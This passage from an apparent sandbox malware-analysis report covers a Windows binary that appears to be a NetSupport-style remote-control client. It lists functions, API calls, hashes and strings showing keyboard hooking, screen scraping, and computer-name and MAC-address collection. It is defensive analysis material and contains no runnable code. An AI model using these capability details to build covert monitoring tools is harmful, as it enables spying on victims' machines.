                                                                                        • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                        • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50
                                                                                        Function 11133920 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1909 11133920-1113395c 1910 11133962-11133984 call 1105dd10 1909->1910 1911 11133c84-11133c9f call 11161d01 1909->1911 1910->1911 1916 1113398a-1113399e GetLocalTime 1910->1916 1917 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 1916->1917 1918 111339a0-111339bc call 11146450 1916->1918 1925 11133a45-11133a5b GetProcAddress 1917->1925 1926 11133a5d-11133a64 GetProcessHandleCount 1917->1926 1918->1917 1925->1926 1927 11133a66-11133a68 SetLastError 1925->1927 1928 11133a6e-11133a76 1926->1928 1927->1928 1929 11133a92-11133a9e 1928->1929 1930 11133a78-11133a90 GetProcAddress 1928->1930 1932 11133aa0-11133ab8 GetProcAddress 1929->1932 1934 11133aba-11133ac5 1929->1934 1930->1929 1931 11133ac7-11133ad2 SetLastError 1930->1931 1931->1932 1932->1934 1935 11133ad4-11133adc SetLastError 1932->1935 1936 11133adf-11133aef GetProcAddress 1934->1936 1935->1936 1937 11133af1-11133afd K32GetProcessMemoryInfo 1936->1937 1938 11133aff-11133b01 SetLastError 1936->1938 1940 11133b07-11133b15 1937->1940 1938->1940 1941 11133b23-11133b2e 1940->1941 1942 11133b17-11133b1f 1940->1942 1943 11133b30-11133b38 1941->1943 1944 11133b3c-11133b47 1941->1944 1942->1941 1943->1944 1945 11133b55-11133b5f 1944->1945 1946 11133b49-11133b51 1944->1946 1947 11133b61-11133b68 1945->1947 1948 11133b6a-11133b6d 1945->1948 1946->1945 1949 11133b6f-11133b7d call 11146450 1947->1949 1948->1949 1950 11133b80-11133b92 1948->1950 1949->1950 1954 11133c5a-11133c68 1950->1954 1955 11133b98-11133baa call 110637c0 1950->1955 1957 11133c6a-11133c6b FreeLibrary 1954->1957 1958 11133c6d-11133c75 1954->1958 1955->1954 1963 11133bb0-11133bd1 call 1105dd10 1955->1963 1957->1958 1959 11133c77-11133c78 FreeLibrary 1958->1959 1960 11133c7a-11133c7f 1958->1960 1959->1960 1960->1911 1962 11133c81-11133c82 FreeLibrary 1960->1962 1962->1911 1966 11133bd3-11133bd9 1963->1966 1967 11133bdf-11133bfb call 1105dd10 1963->1967 1966->1967 1968 11133bdb 1966->1968 1971 11133c06-11133c22 call 1105dd10 1967->1971 1972 11133bfd-11133c00 1967->1972 1968->1967 1976 11133c24-11133c27 1971->1976 1977 11133c2d-11133c49 call 1105dd10 1971->1977 1972->1971 1973 11133c02 1972->1973 1973->1971 1976->1977 1978 11133c29 1976->1978 1981 11133c50-11133c53 1977->1981 1982 11133c4b-11133c4e 1977->1982 1978->1977 1981->1954 1983 11133c55 call 11027780 1981->1983 1982->1981 1982->1983 1983->1954
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,1B492F88), ref: 1113398E
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                        • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                        • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                        • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                        • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                        • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                        • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                        • API String ID: 263027137-1001504656
                                                                                        • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                        • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                        • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                        • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65
                                                                                        Function 1102DBC9 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1985 1102dbc9 1986 1102dbd0-1102dbe1 1985->1986 1986->1986 1987 1102dbe3 1986->1987 1988 1102dd24-1102dd3d call 11142ac0 1987->1988 1991 1102dd43-1102dd45 1988->1991 1992 1102dbc0-1102dbc3 1988->1992 1995 1102de43-1102de5d call 111463d0 1991->1995 1996 1102dd4b-1102dd51 1991->1996 1993 1102dbc5-1102dbc7 1992->1993 1994 1102dbe8-1102dbf1 1992->1994 1993->1986 1994->1988 1997 1102dbf7-1102dbfe 1994->1997 2023 1102deb3-1102debf call 1102b4f0 1995->2023 2024 1102de5f-1102de78 call 1105dd10 1995->2024 1999 1102dd53-1102dd62 call 11144dc0 1996->1999 2000 1102dd68-1102dd78 1996->2000 1997->1988 2003 1102dcf3-1102dd08 call 11162de7 1997->2003 2004 1102dc05-1102dc07 1997->2004 2005 1102dd0a-1102dd1f call 11162de7 1997->2005 2006 1102dc9a-1102dccd call 111618c1 call 11142290 1997->2006 2007 1102dcdb-1102dcf1 call 11164010 1997->2007 2008 1102dc8b-1102dc95 1997->2008 2009 1102dccf-1102dcd9 1997->2009 2010 1102dc4c-1102dc52 1997->2010 2011 1102dc7c-1102dc86 1997->2011 1999->2000 2001 1102dd7a 2000->2001 2002 1102dd7f-1102dd9d call 1102cc10 2000->2002 2001->2002 2002->1995 2035 1102dda3-1102ddc8 call 110b7920 call 11146450 2002->2035 2003->1988 2004->1988 2022 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2004->2022 2005->1988 2006->1988 2007->1988 2008->1988 2009->1988 2015 1102dc54-1102dc68 call 11162de7 2010->2015 2016 1102dc6d-1102dc77 2010->2016 2011->1988 2015->1988 2016->1988 2022->1988 2043 1102dec1-1102dec8 2023->2043 2044 1102de98-1102de9f 2023->2044 2024->2023 2040 1102de7a-1102de8c 2024->2040 2071 1102ddd3-1102ddd9 2035->2071 2072 1102ddca-1102ddd1 2035->2072 2040->2023 2060 1102de8e 2040->2060 2046 1102dea5-1102dea8 2043->2046 2049 1102deca-1102ded4 2043->2049 2044->2046 2047 1102e0aa-1102e0cb GetComputerNameA 2044->2047 2054 1102deaa-1102deb1 call 110b7920 2046->2054 2055 1102ded9 2046->2055 2052 1102e103-1102e109 2047->2052 2053 1102e0cd-1102e101 call 11027c30 2047->2053 2049->2047 2064 1102e10b-1102e110 2052->2064 2065 1102e13f-1102e152 call 11164010 2052->2065 2053->2052 2087 1102e157-1102e163 2053->2087 2063 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2054->2063 2055->2063 2060->2044 2122 1102e07a-1102e082 SetLastError 2063->2122 2123 1102dfbc-1102dfd3 2063->2123 2070 1102e116-1102e11a 2064->2070 2081 1102e347-1102e36a 2065->2081 2078 1102e136-1102e138 2070->2078 2079 1102e11c-1102e11e 2070->2079 2074 1102dddb-1102dde2 call 11027d60 2071->2074 2075 1102de39 2071->2075 2072->1995 2074->2075 2091 1102dde4-1102de16 2074->2091 2075->1995 2086 1102e13b-1102e13d 2078->2086 2083 1102e132-1102e134 2079->2083 2084 1102e120-1102e126 2079->2084 2099 1102e392-1102e39a 2081->2099 2100 1102e36c-1102e372 2081->2100 2083->2086 2084->2078 2090 1102e128-1102e130 2084->2090 2086->2065 2086->2087 2092 1102e165-1102e17a call 110b7920 call 11029bd0 2087->2092 2093 1102e17c-1102e18f call 11081a70 2087->2093 2090->2070 2090->2083 2113 1102de20-1102de2f call 110f6080 2091->2113 2114 1102de18-1102de1e 2091->2114 2127 1102e1d3-1102e1ec call 11081a70 2092->2127 2111 1102e191-1102e1b4 2093->2111 2112 1102e1b6-1102e1b8 2093->2112 2102 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2099->2102 2103 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2099->2103 2100->2099 2107 1102e374-1102e38d call 1102d330 2100->2107 2103->2102 2107->2099 2111->2127 2116 1102e1c0-1102e1d1 2112->2116 2118 1102de32-1102de34 call 1102d330 2113->2118 2114->2113 2114->2118 2116->2116 2116->2127 2118->2075 2129 1102e043-1102e04f 2122->2129 2123->2129 2144 1102dfd5-1102dfde 2123->2144 2145 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2127->2145 2146 1102e32c-1102e339 call 11164010 2127->2146 2134 1102e092-1102e0a1 2129->2134 2135 1102e051-1102e05d 2129->2135 2134->2047 2142 1102e0a3-1102e0a4 FreeLibrary 2134->2142 2139 1102e06f-1102e073 2135->2139 2140 1102e05f-1102e06d GetProcAddress 2135->2140 2147 1102e084-1102e086 SetLastError 2139->2147 2148 1102e075-1102e078 2139->2148 2140->2139 2142->2047 2144->2129 2149 1102dfe0-1102e016 call 11146450 call 1112b270 2144->2149 2185 1102e283-1102e299 call 11128ec0 2145->2185 2186 1102e26f-1102e27e call 11029450 2145->2186 2163 1102e33c-1102e341 CharUpperA 2146->2163 2151 1102e08c 2147->2151 2148->2151 2149->2129 2168 1102e018-1102e03e call 11146450 call 11027920 2149->2168 2151->2134 2163->2081 2168->2129 2190 1102e2b2-1102e2ec call 110d0bd0 * 2 2185->2190 2191 1102e29b-1102e2ad call 110d0bd0 2185->2191 2186->2185 2198 1102e302-1102e32a call 11164010 call 110d07c0 2190->2198 2199 1102e2ee-1102e2fd call 11029450 2190->2199 2191->2190 2198->2163 2199->2198
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: $016477$14/03/16 10:38:31 V12.10F8$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                        • API String ID: 1029625771-1026522426
                                                                                        • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                        • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                        • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                        • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51
                                                                                        Function 111414A0 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2205 111414a0-111414e1 call 11146450 2208 111414e7-11141543 LoadLibraryA 2205->2208 2209 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2205->2209 2211 11141545-11141550 call 11017450 2208->2211 2212 11141557-11141560 2208->2212 2221 11141595-1114159b 2209->2221 2222 111415c3 2209->2222 2211->2212 2219 11141552 call 110cc7f0 2211->2219 2212->2209 2213 11141562-11141563 FreeLibrary 2212->2213 2213->2209 2219->2212 2221->2222 2223 1114159d-111415a3 2221->2223 2224 111415cd-111415ed GetClassInfoExA 2222->2224 2223->2222 2225 111415a5-111415c1 call 1105dd10 2223->2225 2226 111415f3-1114161a call 11161d20 call 111444b0 2224->2226 2227 1114168e-111416e6 2224->2227 2225->2224 2236 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2226->2236 2237 1114161c-11141630 call 11029450 2226->2237 2238 11141722-11141728 2227->2238 2239 111416e8-111416ee 2227->2239 2236->2227 2264 11141677-1114168b call 11029450 2236->2264 2237->2236 2243 11141764-11141786 call 1105dd10 2238->2243 2244 1114172a-11141739 call 1110f420 2238->2244 2239->2238 2241 111416f0-111416f6 2239->2241 2241->2238 2247 111416f8-1114170f call 1112c830 LoadLibraryA 2241->2247 2254 11141794-11141799 2243->2254 2255 11141788-11141792 2243->2255 2258 1114175d 2244->2258 2259 1114173b-1114175b 2244->2259 2247->2238 2263 11141711-1114171d GetProcAddress 2247->2263 2261 111417a5-111417ab 2254->2261 2262 1114179b 2254->2262 2255->2261 2260 1114175f 2258->2260 2259->2260 2260->2243 2265 111417ad-111417b3 call 110f7d00 2261->2265 2266 111417b8-111417d1 call 1113cd80 2261->2266 2262->2261 2263->2238 2264->2227 2265->2266 2273 111417d7-111417dd 2266->2273 2274 11141879-1114188a 2266->2274 2275 111417df-111417f1 call 1110f420 2273->2275 2276 11141819-1114181f 2273->2276 2285 111417f3-11141809 call 1115d6d0 2275->2285 2286 1114180b 2275->2286 2278 11141845-11141851 2276->2278 2279 11141821-11141827 2276->2279 2283 11141853-11141859 2278->2283 2284 11141868-11141873 #17 LoadLibraryA 2278->2284 2281 1114182e-11141840 SetTimer 2279->2281 2282 11141829 call 11134930 2279->2282 2281->2278 2282->2281 2283->2284 2288 1114185b-11141861 2283->2288 2284->2274 2291 1114180d-11141814 2285->2291 2286->2291 2288->2284 2289 11141863 call 1112d6a0 2288->2289 2289->2284 2291->2276
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                        • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                        • _memset.LIBCMT ref: 111415F9
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                        • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                        • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                        • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                        • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                        • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                          • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,1B492F88,1102FCB2,00000000), ref: 1101747E
                                                                                          • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                          • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                          • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                          • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                          • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                        • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                        • API String ID: 3706574701-3145203681
                                                                                        • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                        • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                        • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                        • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55
                                                                                        Function 110285F0 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2294 110285f0-1102860d 2295 11028613-11028642 2294->2295 2296 11028cd8-11028cdf 2294->2296 2297 110286d0-11028718 GetModuleFileNameA call 111631f0 call 11163fed 2295->2297 2298 11028648-1102864e 2295->2298 2299 11028cf1-11028cf5 2296->2299 2300 11028ce1-11028cea 2296->2300 2314 1102871d 2297->2314 2304 11028650-11028658 2298->2304 2301 11028cf7-11028d09 call 11161d01 2299->2301 2302 11028d0a-11028d1e call 11161d01 2299->2302 2300->2299 2305 11028cec 2300->2305 2304->2304 2309 1102865a-11028660 2304->2309 2305->2299 2313 11028663-11028668 2309->2313 2313->2313 2315 1102866a-11028674 2313->2315 2318 11028720-1102872a 2314->2318 2316 11028691-11028697 2315->2316 2317 11028676-1102867d 2315->2317 2320 11028698-1102869e 2316->2320 2319 11028680-11028686 2317->2319 2321 11028730-11028733 2318->2321 2322 11028ccf-11028cd7 2318->2322 2319->2319 2323 11028688-1102868e 2319->2323 2320->2320 2324 110286a0-110286ce call 11163fed 2320->2324 2321->2322 2325 11028739-11028747 call 11026890 2321->2325 2322->2296 2323->2316 2324->2318 2330 11028c55-11028c6a call 11163db7 2325->2330 2331 1102874d-11028760 call 11162de7 2325->2331 2330->2322 2338 11028c70-11028cca 2330->2338 2336 11028762-11028765 2331->2336 2337 1102876b-11028793 call 11026700 call 11026890 2331->2337 2336->2330 2336->2337 2337->2330 2343 11028799-110287b6 call 11026980 call 11026890 2337->2343 2338->2322 2348 11028bc5-11028bcc 2343->2348 2349 110287bc 2343->2349 2351 11028bf2-11028bf9 2348->2351 2352 11028bce-11028bd1 2348->2352 2350 110287c0-110287e0 call 11026700 2349->2350 2362 110287e2-110287e5 2350->2362 2363 11028816-11028819 2350->2363 2353 11028c11-11028c18 2351->2353 2354 11028bfb-11028c01 2351->2354 2352->2351 2356 11028bd3-11028bda 2352->2356 2358 11028c1a-11028c25 2353->2358 2359 11028c28-11028c2f 2353->2359 2357 11028c07-11028c0f 2354->2357 2361 11028be0-11028bf0 2356->2361 2357->2353 2357->2357 2358->2359 2364 11028c31-11028c3b 2359->2364 2365 11028c3e-11028c45 2359->2365 2361->2351 2361->2361 2366 110287e7-110287ee 2362->2366 2367 110287fe-11028801 2362->2367 2369 11028bae-11028bbf call 11026890 2363->2369 2370 1102881f-11028832 call 11164150 2363->2370 2364->2365 2365->2330 2368 11028c47-11028c52 2365->2368 2371 110287f4-110287fc 2366->2371 2367->2369 2372 11028807-11028811 2367->2372 2368->2330 2369->2348 2369->2350 2370->2369 2377 11028838-11028854 call 111646ce 2370->2377 2371->2367 2371->2371 2372->2369 2380 11028856-1102885c 2377->2380 2381 1102886f-11028885 call 111646ce 2377->2381 2382 11028860-11028868 2380->2382 2386 11028887-1102888d 2381->2386 2387 1102889f-110288b5 call 111646ce 2381->2387 2382->2382 2384 1102886a 2382->2384 2384->2369 2388 11028890-11028898 2386->2388 2392 110288b7-110288bd 2387->2392 2393 110288cf-110288e5 call 111646ce 2387->2393 2388->2388 2390 1102889a 2388->2390 2390->2369 2395 110288c0-110288c8 2392->2395 2398 110288e7-110288ed 2393->2398 2399 110288ff-11028915 call 111646ce 2393->2399 2395->2395 2397 110288ca 2395->2397 2397->2369 2400 110288f0-110288f8 2398->2400 2404 11028917-1102891d 2399->2404 2405 1102892f-11028945 call 111646ce 2399->2405 2400->2400 2402 110288fa 2400->2402 2402->2369 2406 11028920-11028928 2404->2406 2410 11028947-1102894d 2405->2410 2411 1102895f-11028975 call 111646ce 2405->2411 2406->2406 2408 1102892a 2406->2408 2408->2369 2413 11028950-11028958 2410->2413 2416 11028977-1102897d 2411->2416 2417 1102898f-110289a5 call 111646ce 2411->2417 2413->2413 2414 1102895a 2413->2414 2414->2369 2418 11028980-11028988 2416->2418 2422 110289a7-110289ad 2417->2422 2423 110289bf-110289d5 call 111646ce 2417->2423 2418->2418 2420 1102898a 2418->2420 2420->2369 2424 110289b0-110289b8 2422->2424 2428 110289d7-110289dd 2423->2428 2429 110289ef-11028a05 call 111646ce 2423->2429 2424->2424 2426 110289ba 2424->2426 2426->2369 2430 110289e0-110289e8 2428->2430 2434 11028a07-11028a0d 2429->2434 2435 11028a1f-11028a35 call 111646ce 2429->2435 2430->2430 2432 110289ea 2430->2432 2432->2369 2436 11028a10-11028a18 2434->2436 2440 11028a37-11028a3d 2435->2440 2441 11028a4f-11028a65 call 111646ce 2435->2441 2436->2436 2438 11028a1a 2436->2438 2438->2369 2443 11028a40-11028a48 2440->2443 2446 11028a86-11028a9c call 111646ce 2441->2446 2447 11028a67-11028a6d 2441->2447 2443->2443 2445 11028a4a 2443->2445 2445->2369 2452 11028ab3-11028ac9 call 111646ce 2446->2452 2453 11028a9e 2446->2453 2448 11028a77-11028a7f 2447->2448 2448->2448 2450 11028a81 2448->2450 2450->2369 2458 11028ae0-11028af6 call 111646ce 2452->2458 2459 11028acb 2452->2459 2454 11028aa4-11028aac 2453->2454 2454->2454 2456 11028aae 2454->2456 2456->2369 2464 11028b17-11028b2d call 111646ce 2458->2464 2465 11028af8-11028afe 2458->2465 2461 11028ad1-11028ad9 2459->2461 2461->2461 2462 11028adb 2461->2462 2462->2369 2470 11028b4f-11028b65 call 111646ce 2464->2470 2471 11028b2f-11028b3f 2464->2471 2466 11028b08-11028b10 2465->2466 2466->2466 2468 11028b12 2466->2468 2468->2369 2476 11028b67-11028b6d 2470->2476 2477 11028b7c-11028b92 call 111646ce 2470->2477 2472 11028b40-11028b48 2471->2472 2472->2472 2474 11028b4a 2472->2474 2474->2369 2478 11028b70-11028b78 2476->2478 2477->2369 2482 11028b94-11028b9a 2477->2482 2478->2478 2480 11028b7a 2478->2480 2480->2369 2483 11028ba4-11028bac 2482->2483 2483->2369 2483->2483
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73401370,?,0000001A), ref: 110286DD
                                                                                        • _strrchr.LIBCMT ref: 110286EC
                                                                                          • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
